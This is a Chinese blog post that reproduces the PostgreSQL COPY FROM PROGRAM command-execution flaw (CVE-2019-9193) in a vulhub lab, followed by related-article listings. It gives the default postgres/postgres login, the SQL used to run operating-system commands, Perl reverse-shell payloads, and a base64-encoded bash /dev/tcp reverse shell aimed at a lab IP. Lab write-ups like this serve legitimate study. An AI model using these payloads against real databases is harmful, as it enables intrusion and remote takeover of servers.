PostgreSQL 高权限命令执行 (CVE-2019-9193)

最新推荐文章于 2024-07-01 20:55:39 发布
最新推荐文章于 2024-07-01 20:55:39 发布
阅读量1k 收藏
点赞数 1
分类专栏: # 数据库 # 漏洞复现 文章标签: postgresql linux
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/120633599
版权

在这里插入图片描述

漏洞原理

PostgreSQL是当下最流行的数据库系统之一,它是 Mac OSX系统下最常用的数据库,但同时也提供了Windows及Linux操作系统版本。(Kali下Metasploit用的就是PostgreSQL数据库).

漏洞成因是因为PostgreSQL的特性允许数据库的特定用户在PostgreSQL环境中执行任意代码并且在PostgreSQL 9.3-11.2版本中这个特性是默认开启的。
9.3版本开始PostgreSQL实现了COPY TO/FROM PROGRAM这个新的功能,它允许数据库的超级用户以及pg_read_server_files组用户执行任意的操作系统命令

漏洞复现

使用vulhub搭建环境

# 进入到该漏洞路径
cd postgres/CVE-2019-9193/
# 搭建及运行漏洞环境
docker-compose up -d

可以看到该漏洞开放在5423端口,我们使用kali连接它,默认账号密码为postgres/postgres
在这里插入图片描述

psql --host 127.0.0.1 -p 5432 -U postgres

已经连接上数据库
在这里插入图片描述

postgres数据库RCE有固定的命令如下

# 删除并创建用于保存系统命令执行结果的表 
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
 
# 命令执行测试,多试几条
COPY cmd_exec FROM PROGRAM 'id';
COPY cmd_exec FROM PROGRAM 'whoami';
 
# 查看结果
SELECT * FROM cmd_exec;

在这里插入图片描述
尝试反弹shell,环境里有perl,直接使用perl反弹shell失败

COPY cmd_exec FROM PROGRAM 'perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.170.143:2333");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"';

COPY cmd_exec FROM PROGRAM 'perl -e "use Socket;$i=\"192.168.170.143\";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"'

后来先将反弹shell命令base64编码再执行成功。

# base64编码
echo "bash -i >& /dev/tcp/192.168.170.143/2333 0>&1"|base64

# 执行sql
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MC4xNDMvMjMzMyAwPiYxCg=="|base64 -d|bash';

在这里插入图片描述在这里插入图片描述

参考

漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193)

天问_Herbert555
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】PostgreSQL权限命令执行(CVE-2019-9193)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-01 390
这个漏洞是一个版本漏洞从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令利用的前提1、需要登录2、需要权限所以要先弱口令爆破之后,然后查看是否是权限
CVE-2019-9193PostgreSQL 权限命令执行漏洞
m0_48520508的博客
01-20 882
0x00简介 PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费提供的。 PostgreSQL特点: Ø 支持WINDOWS、Linux、Solaris、macOS 、BSD。 Ø 支持文本、图像、视频、声音等 Ø 支持ACID、关联完整性、数据库事务、Unicode多国语言。 Ø 支持临时表,与物化视图 Ø 支持SQL的许多功
16 - vulhub - Django JSONField/HStoreField SQL注入漏洞CVE-2019-14234)
易编橙 · 终身成长社群,相遇已是上上签!
11-03 1174
Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQ
postgresql命令行 && Sequlize基本操作指令
最新发布
Go_going_的博客
07-01 1449
以下概念来自psql中文文档PostgreSQL是以加州大学伯克利分校计算机系开发的POSTGRES, 版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。POSTGRES 领先的许多概念在很久以后才出现在一些商业数据库系统中。psql是一个PostgreSQL的基于终端的前端。它让你能交互式地键入查询,把它们发送给PostgreSQL,并且查看查询结果。或者,输入可以来自于一个文件或者命令行参数。此外,psql还提供一些元命令和多种类似 shell 的特性来为编写脚本和自动化多种任务提供便利。
CVE-2019-9193PostgreSQL 权限命令执行漏洞的复现
m0_69801663的博客
12-23 1122
CVE-2019-9193PostgreSQL 权限命令执行漏洞
PostgreSQL任意命令执行CVE-2019-9193
GalaxySpaceX的博客
07-03 878
PostgreSQL任意命令执行CVE-2019-9193
PostgreSQL权限
qq_38102203的博客
06-04 1621
在数据库中创建对象时,都会为其分配所有者。 所有者通常是执行创建语句的用户。 对于大多数类型的对象,初始状态是只有所有者(或超级用户)可以修改或删除对象。 要允许其他角色或用户使用它,必须授予权限权限PostgreSQL中的不同类型的权限是:SELECT,INSERT,UPDATE,DELETE,TRUNCATE,REFERENCES,TRIGGER,CREATE,CONNECT,TEMPOR...
0x18.第十八课 MetaSploit对cve-2019-0708的检测.pdf
06-24
第十八课 MetaSploit对cve-2019-0708的检测 #### 概述 本教程详细介绍了如何使用MetaSploit框架来检测CVE-2019-0708漏洞CVE-2019-0708是一个严重的远程代码执行漏洞,影响了多个版本的Windows操作系统,包括...
django_cve_2019_19844_poc:适用于CVE-2019-19844的PoC(https:www.djangoproject.comweblog2019dec18security-releases)
02-04
django_cve_2019_19844_poc PoC要求Python 3.7.x PostgreSQL 9.5或更建立创建数据库(例如django_cve_2019_19844_poc ) 将数据库名称设置为环境变量DJANGO_DATABASE_NAME (例如, export DJANGO_DATABASE_NAME=...
PostgreSQLpostgresql-13.5-1-windows-x64.exe)
11-20
PostgreSQLpostgresql-13.5-1-windows-x64.exe)适用于Windows x86-64 PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),是以加州大学计算机系开发的POSTGRES,4.2版本为基础的...
postgresql-14.1-1-windows-x64
12-05
The PostgreSQL Project thanks Jacob Champion for reporting this problem. (CVE-2021-23214) Make libpq reject extraneous data after an SSL or GSS encryption handshake (Tom Lane) A man-in-the-middle ...
PostgreSQL-9.2.4-1-windows-x64.rar
12-01
解压这个RAR文件后,我们会得到"PostgreSQL-9.2.4-1-windows-x64.exe",这是用于安装PostgreSQL的可执行文件。 1. **安装准备**:在开始安装前,确保你的计算机满足PostgreSQL的硬件和软件需求,包括至少2GB的内存...
【vulhub】PostGresql权限命令执行漏洞复现(CVE-2019-9193)
errorr0
08-05 824
CVE-2019-9193
CVECVE-2019-9193PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3643
CVECVE-2019-9193PostgreSQL任意命令执行漏洞
CVE-2019-9193权限远程命令执行漏洞)vulhub复现
qq_52279315的博客
05-17 560
vulhub靶场复现【postgresql
postgre提权(CVE-2019-9193)
weixin_45701675的博客
11-18 1224
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 提权利用的是漏洞CVE-2019-9193 CVE-2018-1058 本次演示CVE-2019-9193提权 复现步骤 开启测试环境 连接postgres 新建查询,执行 尝试读取敏感文件 cat /etc/passwd,低权限用户无权限查询 测试成功 ...
PostgreSQL 权限命令执行漏洞复现(CVE-2019-9193)
又菜又爱倒腾的博客
10-29 1783
#PostgreSQL 权限命令执行漏洞(CVE-2019-9193)# 一、漏洞简介 PostgreSQL是功能强大的数据库软件,可在所有主要操作系统上运行,包括Linux,Windows,Mac OS X等。所公开的漏洞存在于命令“COPY TO / FROM PROGRAM”中,用于导入和导出数据。在“pg_read_server_files”组中的用户执行上述命令之后,可以获得数据库超级用户权限,从而执行任何系统命令。 二、漏洞影响 影响版本 PostgreSQL 9.3-11.2 三、产生原因
CVE-2019-9193 PostgreSQL 权限命令执行漏洞
qq_51979295的博客
10-08 634
康复训练
PostgreSQL权限命令执行(CVE-2019-9193)漏洞复现&实战
jihaichen的博客
04-26 2757
一、漏洞利用 这个漏洞是一个版本漏洞 从9.3版本开始,Postgres新增了一个COPYTO/FROMPROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作 系统命令,利用的前提 1、需要登录2、需要权限 所以要先弱口令爆破之后,然后查看是否是权限。 这里之所以选择复现这个漏洞,因为其中的思路比较有意思,也就是看回显的思路。 先大体讲一下这个漏洞是怎么看回显的,他是通过命令执行然后把回显写入创建的一张表里面,下面来具体操作。 先删除你
shell切换用户执行postgresql添加用户权限命令
03-31
1. 使用sudo切换到具有管理员权限的用户 ``` sudo su ``` 2. 切换到postgres用户 ``` su postgres ``` 3. 进入postgres命令行界面 ``` psql ``` 4. 添加用户权限 ``` GRANT ALL PRIVILEGES ON DATABASE <database_name> TO <user_name>; ``` 其中,`<database_name>`是要授权的数据库名称,`<user_name>`是要授权的用户名称。 5. 退出postgres命令行界面 ``` \q ``` 6. 退出postgres用户 ``` exit ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值